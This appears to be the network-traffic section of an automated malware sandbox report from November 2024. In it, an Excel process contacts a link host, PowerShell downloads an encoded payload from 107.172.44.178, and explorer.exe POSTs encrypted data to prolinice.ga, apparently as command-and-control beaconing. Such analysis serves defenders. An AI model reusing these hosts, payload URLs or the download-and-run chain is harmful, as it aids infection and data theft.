                                                                                                                                                  Nov 18, 2024 18:22:16.769748926 CET1236INData Raw: 6a 62 5a 5a 64 4d 62 6c 37 41 57 51 64 77 53 4c 6a 30 42 75 56 6b 70 6c 6c 38 5a 46 73 4d 79 61 62 30 36 59 72 4d 34 4b 69 57 51 48 77 55 32 4b 32 35 51 4a 4e 30 56 4c 46 47 30 53 6b 48 62 4a 6a 4e 78 57 56 4e 2b 55 62 43 52 5a 33 44 30 32 71 5a
                                                                                                                                                  Data Ascii: jbZZdMbl7AWQdwSLj0BuVkpll8ZFsMyab06YrM4KiWQHwU2K25QJN0VLFG0SkHbJjNxWVN+UbCRZ3D02qZ108LzPpQZbLUCHlMBOt2lynKxVufSLRGxuTWNFfK1YlKywbvtIRcKVbsCgU0j5aVAPpNkjnFRTQslVjD1GB7lS1IgHF4ILNSbZRUlEs0GXO0JFEtS2UAKEvbxYn4OACWROSUAFRLRLTkdFlIRoWlxX3UWQhPWGFNm


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  5192.168.2.2249174107.172.44.178803836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 18, 2024 18:22:36.808487892 CET78OUTGET /53/WRFFRGT.txt HTTP/1.1
                                                                                                                                                  Host: 107.172.44.178
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Nov 18, 2024 18:22:37.493957996 CET1236INHTTP/1.1 200 OK
                                                                                                                                                  Date: Mon, 18 Nov 2024 17:22:37 GMT
                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                  Last-Modified: Mon, 18 Nov 2024 01:44:05 GMT
                                                                                                                                                  ETag: "c558-627260d4938d1"
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Content-Length: 50520
                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: text/plain
                                                                                                                                                  Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                                                                                                                  Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                  Nov 18, 2024 18:22:37.493993998 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                  Nov 18, 2024 18:22:37.494014978 CET424INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                  Nov 18, 2024 18:22:37.494033098 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                  Nov 18, 2024 18:22:37.494057894 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                  Nov 18, 2024 18:22:37.494115114 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                  Nov 18, 2024 18:22:37.494131088 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                  Nov 18, 2024 18:22:37.494158983 CET848INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                  Nov 18, 2024 18:22:37.494177103 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                  Nov 18, 2024 18:22:37.494255066 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                  Nov 18, 2024 18:22:37.499233961 CET1236INData Raw: 76 62 78 59 6e 34 4f 41 43 57 52 4f 53 55 41 46 52 4c 52 4c 54 6b 64 46 6c 49 52 6f 57 6c 78 58 33 55 57 51 68 50 57 47 46 4e 6d 6d 46 4e 47 46 62 4a 31 59 5a 43 62 42 68 54 5a 4e 38 78 52 44 73 52 52 35 45 51 48 46 56 49 56 49 64 6d 39 6d 67 45
                                                                                                                                                  Data Ascii: vbxYn4OACWROSUAFRLRLTkdFlIRoWlxX3UWQhPWGFNmmFNGFbJ1YZCbBhTZN8xRDsRR5EQHFVIVIdm9mgEZ2W8RIFbVN/lsLqwlWXBmEX+VqIWFk0Y1YQthDe0wPWM054cTBTEdFhIR3UkdXhI7DbwS7V5YKRv9nu8ZFtCy6Y0yYrBRlbO1oVtBEIPwGTM2I5PRRUEpEhNRnVWsN+KBVrLChcd5oUaVGTUR6TUBFhLRHXklUhe4


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  6192.168.2.224917546.173.214.24801244C:\Windows\explorer.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 18, 2024 18:22:41.198791027 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: */*
                                                                                                                                                  Referer: http://ashjidrdhauflvyw.net/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Content-Length: 275
                                                                                                                                                  Host: prolinice.ga
                                                                                                                                                  Nov 18, 2024 18:22:41.198818922 CET275OUTData Raw: 6e e2 e5 fa c1 4f f4 14 6d 64 c5 11 3a 2b 8d 8e d8 54 ea 27 4e fd bb eb 83 9e 05 1e ac 34 37 73 36 c2 e5 c1 08 d1 89 d5 67 bb c4 f1 99 ac 30 26 e8 37 1e 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 fb bc 52 ee cc 59 3b 1f d6 b3 50 4c 85 65 c2 e2 ce
                                                                                                                                                  Data Ascii: nOmd:+T'N47s6g0&7H8.6hEvRY;PLe3jKby FK';]Nx1P}[TT=uowlq0p|1MRbnF7U/k&UD>qF?@Eg/8*Fa_w
                                                                                                                                                  Nov 18, 2024 18:22:42.390245914 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                  Date: Mon, 18 Nov 2024 17:22:42 GMT
                                                                                                                                                  Server: Apache/2.4.59 (Debian)
                                                                                                                                                  Connection: close
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                  Data Raw: 35 32 64 35 33 0d 0a 84 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 4d 93 dc e5 25 0a ed e2 44 4a 3b 47 a5 77 e3 2c 25 29 67 7b b4 1d 52 9a 46 7a 54 8c 7e 72 ec d5 7e f4 44 cf b3 6b eb a7 41 63 d4 4a be ec 6e e8 4b 42 15 65 fa 28 3b 12 b5 17 01 51 60 01 78 3a 91 7f 32 8b 47 78 ce d5 ea f0 7b d0 1e 45 fe 16 dc 84 fa d9 be 93 bd db 4a 1d 9f ac 79 dd 2f b5 84 79 6d 21 b3 90 51 dc c2 a5 14 5d bd 12 b6 4b 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f 66 73 fe c7 15 ac cd f6 9d 88 6a 44 07 1e 8d 8b 6b 24 18 2b 4b 2a ec 81 b7 50 50 a4 4e ad cf 32 5c c0 15 b4 57 90 1b 0d ee 6c f7 54 23 c9 ed 8e bc 36 a0 b4 7a [TRUNCATED]
                                                                                                                                                  Data Ascii: 52d53_'!yS5&M%DJ;Gw,%)g{RFzT~r~DkAcJnKBe(;Q`x:2Gx{EJy/ym!Q]K,|WS}"w2bqv?OURB2hvt)U>P$\;QI*zzdyW&Fv"-CL=pK@Bp^kQfsjDk$+K*PPN2\WlT#6zbRKZ :D?UkKc'O?i@i3E| [}S2TqL L7@x!F*Ex{4@h;pg_Q@[N2*H%s;"r21LVRvo9bN|P,ds,^L+j m.&>g!=/r:l_U*kH >(OAO|q;@+o%Snnq nU[f&C5GT] T]>g{v[ySzB8IX<\r}23:=;HX>H+exij=Ou`'p3|JY=R^Xo[#kn^T-la@9>$z|kXv6]O8Rp|otzAY2u-jk75HwbEIrBG`yDvWR0md9n/oc$7;KC?iT6cTD/m#R|~Yr [TRUNCATED]
                                                                                                                                                  Nov 18, 2024 18:22:42.390294075 CET212INData Raw: 50 60 c1 62 4e 47 09 99 34 01 6f 12 1a 46 5a dc 19 8a 32 8e 3a 4a 46 78 d9 bd c0 47 06 63 a2 e7 43 6c 5f a3 5c e6 3f 2b e2 a7 6d 88 36 d1 ab 7a 33 cd e9 51 55 b8 03 fb 2e 0d 79 6a 86 6c 78 60 5a 8e 07 2c 38 79 4f 36 32 6e 72 7e f0 72 29 40 6c 3b
                                                                                                                                                  Data Ascii: P`bNG4oFZ2:JFxGcCl_\?+m6z3QU.yjlx`Z,8yO62nr~r)@l;i2,!a'MyPXN_k0aW,xqWbsevmBH,c:l%TM007#1<?y
                                                                                                                                                  Nov 18, 2024 18:22:42.390305996 CET1236INData Raw: 99 65 d5 2d f5 67 a5 df 07 1c 74 f5 67 bd 63 db 08 77 af d3 8c 6d 56 60 26 f6 24 45 a8 5e 97 11 75 41 b4 77 49 98 30 71 b8 06 83 3a dd 3c bd f3 ae 0b 02 a2 80 23 7f 02 79 66 c6 fa 48 ee 4a d1 79 d0 3c 96 bd 13 34 1f 1d 11 5e 2f 7c 94 67 02 e3 78
                                                                                                                                                  Data Ascii: e-gtgcwmV`&$E^uAwI0q:<#yfHJy<4^/|gxgaD{t`viG"J+`RsqN:#(]5%f__`BxTCB/Z|-t[DDgd/pXLid*C!@qv^=:g{
                                                                                                                                                  Nov 18, 2024 18:22:42.390321016 CET1236INData Raw: b0 08 1a b5 21 fe 8d 1b a2 44 ad 36 e0 77 5c 98 a2 fe 1c 8d ed 29 14 9b f8 aa 38 f5 1e c1 35 2f 97 51 4e 7c 84 77 95 ee de c1 ce 9f 6e 32 2b 10 77 b2 d9 30 2f 02 81 e1 38 a6 a6 13 f3 02 84 36 53 75 ea a1 a0 c1 cc 39 0a f5 bc 99 22 4d 2e 18 6b bc
                                                                                                                                                  Data Ascii: !D6w\)85/QN|wn2+w0/86Su9"M.k$qW[PNkW,RPj+\mT~/^\U&gB,5<z#{4s/X/5e?s$lQ7]FsF[7):lFp?.%8*s,t!
                                                                                                                                                  Nov 18, 2024 18:22:42.390327930 CET1236INData Raw: ad 7d 76 06 9c a3 e1 b9 8d ef cd 66 61 75 c8 9e 29 8d 8f 4e 72 29 15 bc f2 3c 68 2f 82 44 67 71 60 3f 94 9d 7c 6c 44 9a d5 97 1d 7e 04 9e a2 63 5e 91 25 97 02 bc cb 75 1e 3d 91 36 4e 21 8c cb b0 d0 e4 5c eb b3 1b 7d da 01 14 01 4b 31 34 e6 fa 9c
                                                                                                                                                  Data Ascii: }vfau)Nr)<h/Dgq`?|lD~c^%u=6N!\}K14KH;z<d#C^n+~UdH+J8SSo_g+>yS^5%#B>ef)wO/jHP:+ -/_A]K*_kkOly1Tp`|
                                                                                                                                                  Nov 18, 2024 18:22:42.390422106 CET636INData Raw: 68 c9 d2 dc e0 02 14 01 a2 56 a5 31 58 c7 29 8b b7 d1 6a 47 a4 44 d4 5f 87 43 d9 f3 f9 12 9f da 66 d2 14 69 65 fe 9f 52 b4 f7 48 ee 6e ea 63 51 6c 27 24 75 3b c5 f4 71 82 0c 92 8b 9c 90 64 7f 9c d7 42 dd 34 ce 5d 8c 2a df cb 92 5e 25 ae f7 d0 bd
                                                                                                                                                  Data Ascii: hV1X)jGD_CfieRHncQl'$u;qdB4]*^%oAwKlos\if[y-ea(78i4v>ZGNj-L.EQO h/8gHmxPPc!}P04 .0Yf8a%`w%BEYMmQ5PIQ
                                                                                                                                                  Nov 18, 2024 18:22:42.390717030 CET1236INData Raw: 90 6f d5 86 12 6d fc 53 13 a8 c1 0a 8a af 89 df 66 25 35 10 34 1c 6d 7b 67 78 d5 80 d4 cd a3 f4 c9 4b 09 b2 8f c5 69 b3 e3 2e 68 db 5f 54 ac f4 4b ea f4 95 cf a6 e0 97 64 46 fa b2 4c 4e 19 30 04 78 43 d3 ff 6c 6e 19 40 99 27 48 d4 f5 71 c8 8c eb
                                                                                                                                                  Data Ascii: omSf%54m{gxKi.h_TKdFLN0xCln@'Hq^o)h/dP,k}4K:VmBJ:Im;#OON {QK>:J*mD9Jwx23gk>7)$*YqPVpECH$H;\l=gK3c{R\Qo
                                                                                                                                                  Nov 18, 2024 18:22:42.390722036 CET1236INData Raw: 81 1a 91 ad a0 f5 38 b8 7c 5b 42 82 cf 5c f8 f3 8a 04 61 3a 4d dd dd 2d 80 40 2b 22 ee 6b 6f 17 fa dd b9 cf 0d 84 3f d4 e3 ff 65 86 bb 51 5d 2a 36 81 2d d3 fc 54 91 22 56 f9 f4 d4 62 b0 18 c9 6c 00 f4 c6 78 56 7e 7b 79 2f 4f e9 2f a8 24 40 4b f4
                                                                                                                                                  Data Ascii: 8|[B\a:M-@+"ko?eQ]*6-T"VblxV~{y/O/$@K+3i{5js&EfUF=vDN%n2 RC8GYNe?hj$T"sScdZl"[ff0EUZ(qnmT(
                                                                                                                                                  Nov 18, 2024 18:22:42.390734911 CET424INData Raw: a6 96 79 ab d8 ea fc d0 6c 2a ce b7 f0 59 51 2b f2 52 dc c2 91 56 73 13 17 ac 6a 0c 48 df f3 c5 67 94 98 30 c9 61 29 99 61 e4 76 f7 50 1d d8 1c 6c 69 6c c8 a4 9b eb 9a 64 c0 aa 3f ac fc 91 d5 b6 d0 fd da 36 cd 1a de 5c 7c 7a b3 9d 21 83 37 62 79
                                                                                                                                                  Data Ascii: yl*YQ+RVsjHg0a)avPlild?6\|z!7bySpm*@|>5j<~M@Gl37Mai,EW8'xgKP+j<]Cqrh]AQh;n}Q7tJ%9>D-pOk
                                                                                                                                                  Nov 18, 2024 18:22:42.390836954 CET1236INData Raw: 5f 40 71 1e 0c 66 ab e7 99 68 90 12 29 11 97 ee 5b 02 5c fd 05 4c 9d ba f2 ec 4d 6a f5 8d 8a ae 38 4c be b2 c6 8a e5 63 79 a3 8c 19 79 3a 5f 77 90 9c 7c 94 e4 f9 4f 7c 3a ba 38 a1 7f 33 47 55 9b 2e 52 17 3d ce b6 e7 90 7d 0f 3a 11 da 07 18 69 c9
                                                                                                                                                  Data Ascii: _@qfh)[\LMj8Lcyy:_w|O|:83GU.R=}:iq9[NT}];XuaJ6[?'ZGPIOpo9oQDoOVFhuu<gB#qx)z#j-d$hUe4U4GX


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  7192.168.2.224917646.173.214.24803756C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 18, 2024 18:22:57.567322969 CET274OUTPOST /index.php HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: */*
                                                                                                                                                  Referer: http://prolinice.ga/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Content-Length: 1395
                                                                                                                                                  Host: prolinice.ga
                                                                                                                                                  Nov 18, 2024 18:22:57.567322969 CET1395OUTData Raw: 6e e2 e5 fa c1 4f f4 14 6d 64 c5 11 3a 2b 8d 8e d8 54 ea 27 4e fd bb eb 83 9e 05 1e ac 34 37 73 36 c2 e5 c1 08 d1 89 d5 67 bb c4 b0 d5 ee 65 75 c5 67 5d 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 9a bd 52 eb cc 59 3b 1f d6 b2 50 4c 85 5d 82 f8 a2
                                                                                                                                                  Data Ascii: nOmd:+T'N47s6geug]H8.6hEvRY;PL]Oc~k_!z1rJC\S7Wx*>x :xGresn*q~jE%ow#RCIP6=I.:ua)i1b|Fz1ra!
                                                                                                                                                  Nov 18, 2024 18:22:58.746625900 CET584INHTTP/1.1 404 Not Found
                                                                                                                                                  Date: Mon, 18 Nov 2024 17:22:58 GMT
                                                                                                                                                  Server: Apache/2.4.59 (Debian)
                                                                                                                                                  Content-Length: 409
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f [TRUNCATED]
                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  0192.168.2.22491615.45.108.484433224C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-11-18 17:21:29 UTC391OUTGET /bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helen HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                  Host: link.uebie.de
